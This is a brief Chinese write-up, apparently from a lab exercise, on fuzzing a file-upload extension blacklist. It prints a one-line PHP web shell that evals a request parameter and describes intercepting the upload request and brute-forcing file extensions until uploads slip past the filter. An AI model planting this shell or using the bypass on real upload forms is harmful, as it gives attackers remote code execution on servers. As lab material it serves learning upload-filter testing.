FUZZ 测试文件上传靶场的黑名单 文章目录 FUZZ 测试文件上传靶场的黑名单前言测试 前言 //一句话木马 <?php @eval($_REQUEST[maple]); phpinfo(); ?> 测试 这里要求我们上传图片,先上传一句话木马1.php 这里提示我们不允许上传这些后缀名的文件,我们尝试抓包 尝试爆破,选择后缀名 使用输入看看能不能绕过,然后不将url编码,开始爆破 这里看到都上传成功了,随便点开一个 居然打不开,但是有一个很特殊的文件 双击一下发现是可以打开的